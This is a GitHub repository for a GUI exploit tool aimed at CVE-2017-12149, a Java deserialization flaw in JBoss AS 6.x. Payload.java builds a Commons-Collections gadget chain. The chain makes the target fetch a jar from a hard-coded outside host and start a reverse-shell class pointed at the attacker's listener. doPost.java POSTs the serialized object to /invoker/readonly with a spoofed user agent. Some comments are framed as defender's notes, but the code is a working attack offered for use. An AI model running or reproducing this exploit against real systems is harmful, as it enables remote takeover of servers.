├── README.md
└── jboss
├── .classpath
├── .project
├── .settings
├── org.eclipse.core.resources.prefs
└── org.eclipse.jdt.core.prefs
├── ReverseShellCommonsCollectionsHashMap.ser
├── bin
└── com
│ └── jboss
│ └── main
│ ├── MainAPP$1.class
│ ├── MainAPP$2.class
│ ├── MainAPP.class
│ ├── Payload.class
│ ├── ReverseShellCommonsCollectionsHashMap.class
│ └── doPost.class
├── lib
├── commons-collections-3.2.1.jar
└── quaqua.jar
└── src
└── com
└── jboss
└── main
├── MainAPP.java
├── Payload.java
└── doPost.java
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2017-12149
2 | CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版)
3 | 根据作者命令行模式改写gui界面
4 | detail:http://www.cnblogs.com/sevck/p/7874438.html
5 | 
6 |
--------------------------------------------------------------------------------
/jboss/.classpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/jboss/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | jboss
4 |
5 |
6 |
7 |
8 |
9 | org.eclipse.jdt.core.javabuilder
10 |
11 |
12 |
13 |
14 |
15 | org.eclipse.jdt.core.javanature
16 |
17 |
18 |
--------------------------------------------------------------------------------
/jboss/.settings/org.eclipse.core.resources.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | encoding//src/com/jboss/main/Payload.java=UTF-8
3 | encoding//src/com/jboss/main/ReverseShellCommonsCollectionsHashMap.java=UTF-8
4 | encoding//src/com/jboss/main/doPost.java=UTF-8
5 | encoding/=UTF-8
6 |
--------------------------------------------------------------------------------
/jboss/.settings/org.eclipse.jdt.core.prefs:
--------------------------------------------------------------------------------
1 | eclipse.preferences.version=1
2 | org.eclipse.jdt.core.compiler.codegen.inlineJsrBytecode=enabled
3 | org.eclipse.jdt.core.compiler.codegen.targetPlatform=1.6
4 | org.eclipse.jdt.core.compiler.codegen.unusedLocal=preserve
5 | org.eclipse.jdt.core.compiler.compliance=1.6
6 | org.eclipse.jdt.core.compiler.debug.lineNumber=generate
7 | org.eclipse.jdt.core.compiler.debug.localVariable=generate
8 | org.eclipse.jdt.core.compiler.debug.sourceFile=generate
9 | org.eclipse.jdt.core.compiler.problem.assertIdentifier=error
10 | org.eclipse.jdt.core.compiler.problem.enumIdentifier=error
11 | org.eclipse.jdt.core.compiler.source=1.6
12 |
--------------------------------------------------------------------------------
/jboss/ReverseShellCommonsCollectionsHashMap.ser:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/ReverseShellCommonsCollectionsHashMap.ser
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/MainAPP$1.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/MainAPP$1.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/MainAPP$2.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/MainAPP$2.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/MainAPP.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/MainAPP.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/Payload.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/Payload.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/ReverseShellCommonsCollectionsHashMap.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/ReverseShellCommonsCollectionsHashMap.class
--------------------------------------------------------------------------------
/jboss/bin/com/jboss/main/doPost.class:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/bin/com/jboss/main/doPost.class
--------------------------------------------------------------------------------
/jboss/lib/commons-collections-3.2.1.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/lib/commons-collections-3.2.1.jar
--------------------------------------------------------------------------------
/jboss/lib/quaqua.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sevck/CVE-2017-12149/cdb08d5b3a27414125b2b0bdf13ae97e336cfd33/jboss/lib/quaqua.jar
--------------------------------------------------------------------------------
/jboss/src/com/jboss/main/MainAPP.java:
--------------------------------------------------------------------------------
1 | package com.jboss.main;
2 |
3 | import java.awt.Container;
4 | import java.awt.Dimension;
5 | import java.awt.FlowLayout;
6 | import java.awt.GridLayout;
7 | import java.awt.event.ActionEvent;
8 | import java.awt.event.ActionListener;
9 | import java.io.DataInputStream;
10 | import java.io.File;
11 | import java.io.FileInputStream;
12 | import java.io.FileOutputStream;
13 | import java.io.IOException;
14 | import java.lang.reflect.InvocationTargetException;
15 | import java.util.ArrayList;
16 | import java.util.List;
17 |
18 | import javax.swing.JButton;
19 | import javax.swing.JFrame;
20 | import javax.swing.JLabel;
21 | import javax.swing.JOptionPane;
22 | import javax.swing.JRootPane;
23 | import javax.swing.JTextArea;
24 | import javax.swing.JTextField;
25 | import javax.swing.UIManager;
26 | import javax.swing.UnsupportedLookAndFeelException;
27 |
28 |
/**
 * Swing front-end of the CVE-2017-12149 proof of concept. It collects the JBoss
 * {@code host:port} and the listener {@code host:port}, asks {@link Payload} to write
 * the serialized object to disk, and hands that file to {@link doPost}, which POSTs it
 * to the target's {@code /invoker/readonly} path.
 *
 * Defender's note: the only network activity of this class is that single cleartext
 * HTTP POST carrying no credentials. Alerting on POST requests to
 * {@code /invoker/readonly} whose body is a Java serialization stream, and removing
 * or access-restricting the invoker servlet on JBoss AS 6.x, are the controls that
 * matter here; the Swing code itself does nothing beyond collecting two strings.
 */
public class MainAPP extends JFrame {
    JLabel server_lab = new JLabel("jboss ip/port:");
    JTextField server = new JTextField(25);        // target "host:port"
    JLabel local_ip_lab = new JLabel("shell ip/port:");
    JTextField local_ip = new JTextField(25);      // listener "host:port", passed verbatim to Payload
    JButton btn = new JButton("Send");
    JButton help = new JButton("Read Me");

    /**
     * Builds and shows the frame. Statement order matters: {@code setUndecorated}
     * must precede {@code setVisible} (Swing rejects it once the frame is
     * displayable), and the root-pane decoration style is applied before
     * {@link #init()} lays out the controls.
     */
    public MainAPP() {
        setUndecorated(true);
        setDefaultCloseOperation(3); // 3 == JFrame.EXIT_ON_CLOSE, written as a magic number
        setFocusableWindowState(true);
        JRootPane rp = getRootPane();
        setVisible(true);
        this.setTitle("CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版) By:Sevck");
        this.setSize(560, 230);// width, height
        this.setResizable(false);
        this.setLocationRelativeTo(null); // centre on screen
        rp.setWindowDecorationStyle(JRootPane.FRAME); // title bar drawn by the look-and-feel
        init();
    }

    /**
     * Lays out the two label/field pairs and the two buttons, and wires the
     * button handlers.
     */
    public void init() {
        Container cp = this.getContentPane();
        this.setLayout(new FlowLayout(FlowLayout.LEFT,20,40));// layout
        cp.add(server_lab);
        cp.add(server);
        cp.add(btn);
        cp.add(local_ip_lab);
        cp.add(local_ip);
        cp.add(help);
        btn.addActionListener(new ActionListener() {

            @Override
            public void actionPerformed(ActionEvent e) {
                btn_startActionPerformed(e);

            }
        });
        help.addActionListener(new ActionListener() {

            @Override
            public void actionPerformed(ActionEvent e) {
                // Usage hint only: shows the expected "host:port" format for both fields.
                JOptionPane.showMessageDialog(null, "jboss:192.168.197.25:8080\r\nshell:192.168.197.12:1234");

            }
        });
    }

    /**
     * "Send" handler: rejects empty fields, generates the .ser file, then posts it.
     *
     * @param evt the button event (unused)
     */
    private void btn_startActionPerformed(ActionEvent evt) {
        String jboss_ip = this.server.getText(); // target host:port (original comment was mis-encoded)
        String local_ip = this.local_ip.getText(); // listener host:port; this local shadows the field of the same name
        if (jboss_ip.equalsIgnoreCase("") || local_ip.equalsIgnoreCase("")){
            String msg = "JBoss服务器和反弹IP端口字段不能为空"; // "the JBoss server and listener ip/port fields must not be empty"
            JOptionPane.showMessageDialog(null, msg);
            return ;
        }
        String msg = ""; // unused local
        // generate payload
        Payload payload = new Payload();
        String result = null;
        try {
            result = payload.PayloadGeneration(local_ip);
        }catch (Exception e) {
            // Only the message is shown; `result` is assigned but never inspected.
            JOptionPane.showMessageDialog(null, e.getMessage());
        }
        String fileName = "ReverseShellCommonsCollectionsHashMap.ser";
        // Payload writes the file relative to the JVM working directory; this path assumes
        // the same directory and uses a Windows-style separator.
        String filePath = System.getProperty("user.dir")+"\\ReverseShellCommonsCollectionsHashMap.ser";
        System.out.println(filePath);
        // Cleartext HTTP to the JBoss HttpInvoker read-only servlet.
        doPost.DoPost("http://"+jboss_ip+"/invoker/readonly", filePath,fileName);
        JOptionPane.showMessageDialog(null, "just do it.");
    }

    /**
     * Entry point: installs the Quaqua look-and-feel (lib/quaqua.jar) and opens the frame.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        // LookAndFeel
        System.setProperty("Quaqua.tabLayoutPolicy", "wrap");

        try {
            UIManager.setLookAndFeel(ch.randelshofer.quaqua.QuaquaManager
                    .getLookAndFeel());
        } catch (UnsupportedLookAndFeelException e) {
            // NOTE(review): swallowed; the default look-and-feel simply stays in effect.
        }
        new MainAPP();


    }

}
117 |
--------------------------------------------------------------------------------
/jboss/src/com/jboss/main/Payload.java:
--------------------------------------------------------------------------------
1 | package com.jboss.main;
2 | import java.io.FileOutputStream;
3 | import java.io.IOException;
4 | import java.io.ObjectOutputStream;
5 | import java.lang.reflect.Field;
6 | import java.lang.reflect.InvocationTargetException;
7 | import java.net.URL;
8 | import java.net.URLClassLoader;
9 | import java.util.HashMap;
10 | import java.util.HashSet;
11 | import java.util.Map;
12 |
13 | import org.apache.commons.collections.Transformer;
14 | import org.apache.commons.collections.functors.ChainedTransformer;
15 | import org.apache.commons.collections.functors.ConstantTransformer;
16 | import org.apache.commons.collections.functors.InstantiateTransformer;
17 | import org.apache.commons.collections.functors.InvokerTransformer;
18 | import org.apache.commons.collections.keyvalue.TiedMapEntry;
19 | import org.apache.commons.collections.map.LazyMap;
20 |
/**
 * Writes the serialized object this proof of concept sends to JBoss (CVE-2017-12149):
 * a Commons-Collections 3.2.1 transformer chain (lib/commons-collections-3.2.1.jar)
 * placed, via reflection, as the key of a one-element {@link HashSet}.
 *
 * Defender's notes: the first transformer points a {@link URLClassLoader} at
 * {@code remoteJar}, a hard-coded third-party URL fetched over cleartext HTTP, so
 * whatever that host serves at the time is what gets loaded — neither the user of this
 * tool nor a reviewer controls it. On the server side a deserialization filter
 * ({@code ObjectInputFilter}, JEP 290) or removing the vulnerable invoker servlet
 * stops this class of object regardless of which gadget library is on the classpath.
 */
public class Payload {
    /**
     * Generates {@code ReverseShellCommonsCollectionsHashMap.ser} in the JVM's working
     * directory.
     *
     * @param info listener as {@code "HOST:PORT"}; an empty string returns the usage text
     *             without writing anything
     * @return a status message: {@code "payload generation success."} or the usage text
     * @throws NumberFormatException if the text after the colon is not an int (from parseInt)
     * @throws ArrayIndexOutOfBoundsException if {@code info} contains no colon (from split)
     * @throws IOException if the .ser file cannot be written
     * @throws NoSuchFieldException if neither field name tried for HashSet/HashMap exists
     */
    @SuppressWarnings ( {"unchecked"} )
    public String PayloadGeneration(String info) throws ClassNotFoundException, NoSuchMethodException, InstantiationException,
            IllegalAccessException, IllegalArgumentException, InvocationTargetException, IOException, NoSuchFieldException {
        String remoteJar = "http://scan.javasec.cn/java/JexRemoteTools.jar"; // hard-coded, cleartext HTTP; see class comment
        String host = null;   // always overwritten after the empty-input check
        int port = 1331;      // always overwritten after the empty-input check
        String msg = null;

        // Check whether the user supplied the listener argument
        if (info.equalsIgnoreCase("") ) {
            msg = "Invalid params! \n" +
                    "Example usage: java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap \"REMOTE_IP:PORT\"";
            FileOutputStream fos = null; // unused local
            return msg;
        }
        host = info.split(":")[0];
        port = Integer.parseInt(info.split(":")[1]);

        // Transformer chain of Commons-Collections functors; the last step hands
        // host/port to the class named "JexReverse" from the remote jar.
        Transformer[] transformers = new Transformer[] {

                new ConstantTransformer(URLClassLoader.class),
                new InstantiateTransformer(
                        new Class[]{
                                URL[].class
                        },
                        new Object[]{
                                new URL[]{new URL(remoteJar)}
                        }),
                new InvokerTransformer("loadClass",
                        new Class[]{
                                String.class
                        },
                        new Object[]{
                                "JexReverse"
                        }),
                new InstantiateTransformer(
                        new Class[]{ String.class, int.class },
                        new Object[]{ host, port }
                )
        };

        // Create the ChainedTransformer from the array of Transformers:
        Transformer transformerChain = new ChainedTransformer(transformers);
        // Create the map
        Map map1 = new HashMap();
        // Decorate the map with LazyMap, using the transformer chain as the factory
        Map lazyMap = LazyMap.decorate(map1,transformerChain);

        TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");

        HashSet map = new HashSet(1);
        map.add("foo");
        Field f = null;
        // Two field names are tried for the set's backing map — presumably to cope with a
        // second runtime's HashSet layout; only "map" is the OpenJDK name. TODO confirm.
        try {
            f = HashSet.class.getDeclaredField("map");
        } catch (NoSuchFieldException e) {
            f = HashSet.class.getDeclaredField("backingMap");
        }

        f.setAccessible(true);
        HashMap innimpl = (HashMap) f.get(map);

        Field f2 = null;
        // Same fallback idea for the HashMap's bucket array.
        try {
            f2 = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException e) {
            f2 = HashMap.class.getDeclaredField("elementData");
        }

        f2.setAccessible(true);
        Object[] array = (Object[]) f2.get(innimpl);

        // Whichever of the first two buckets holds the "foo" entry.
        Object node = array[0];
        if(node == null){
            node = array[1];
        }

        Field keyField = null;
        try{
            keyField = node.getClass().getDeclaredField("key");
        }catch(Exception e){
            // Fallback entry type for a runtime whose node class has no "key" field — presumably; TODO confirm.
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }

        // Replace the entry's key with the TiedMapEntry built above.
        keyField.setAccessible(true);
        keyField.set(node, entry);

        // Serialize the object
        System.out.println("Saving serialized object in ReverseShellCommonsCollectionsHashMap.ser");
        // NOTE(review): neither stream is closed; the file relies on flush() and JVM exit.
        FileOutputStream fos = new FileOutputStream("ReverseShellCommonsCollectionsHashMap.ser");
        ObjectOutputStream oos = new ObjectOutputStream(fos);
        oos.writeObject(map);
        oos.flush();
        msg = "payload generation success.";
        return msg;
    }
}
119 |
--------------------------------------------------------------------------------
/jboss/src/com/jboss/main/doPost.java:
--------------------------------------------------------------------------------
1 | package com.jboss.main;
2 |
3 | import java.io.BufferedOutputStream;
4 | import java.io.BufferedReader;
5 | import java.io.DataInputStream;
6 | import java.io.DataOutputStream;
7 | import java.io.File;
8 | import java.io.FileInputStream;
9 | import java.io.FileOutputStream;
10 | import java.io.InputStreamReader;
11 | import java.net.HttpURLConnection;
12 | import java.net.URL;
13 | import java.net.URLConnection;
14 |
/**
 * Minimal HTTP client that streams a local file as the body of a POST.
 *
 * Defender's note: on the wire this is a cleartext POST whose body is the serialized
 * object written by {@link Payload}, sent with a custom {@code FileName} header and a
 * {@code Content-Type} of application/x-www-form-urlencoded that does not describe the
 * binary body. That header/body mismatch, the fixed user-agent string, and the
 * {@code /invoker/readonly} path supplied by the caller are the observable signals.
 */
public class doPost {

    /**
     * POSTs the bytes of {@code filePath} to {@code url}. Failures are printed to
     * stdout and never propagated.
     *
     * @param url      absolute URL to POST to
     * @param filePath local file whose bytes become the request body
     * @param fileName value of the custom {@code FileName} request header
     */
    public static void DoPost(String url,String filePath,String fileName){
        try {
            URL realUrl = new URL(url);

            HttpURLConnection conn = (HttpURLConnection) realUrl.openConnection();

            conn.setDoInput(true);
            conn.setDoOutput(true);
            conn.setRequestMethod("POST");
            conn.addRequestProperty("FileName", fileName);
            conn.setRequestProperty("accept", "*/*");
            conn.setRequestProperty("user-agent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)"); // fixed, spoofed UA
            conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded"); // does not match the binary body
            BufferedOutputStream out=new BufferedOutputStream(conn.getOutputStream());
            // read the file at filePath
            File file=new File(filePath);
            FileInputStream fileInputStream=new FileInputStream(file);
            byte[]bytes=new byte[1024];
            int numReadByte=0;
            while((numReadByte=fileInputStream.read(bytes,0,1024))>0){
                out.write(bytes, 0, numReadByte);
            }
            out.flush();
            fileInputStream.close(); // NOTE(review): not reached if read() throws — leak on the error path
            // write data
            // Order matters: in its default (non-streaming) mode HttpURLConnection transmits the
            // buffered request when getInputStream() is called, so this line performs the POST.
            // NOTE(review): the response is never read, and `in`, `out` and the connection are
            // never closed or disconnected.
            DataInputStream in=new DataInputStream(conn.getInputStream());
        } catch (Exception e) {
            System.out.println("异常," + e.getMessage()); // "exception," + message; stack trace is suppressed
            // e.printStackTrace();
        }
    }
}
49 |
--------------------------------------------------------------------------------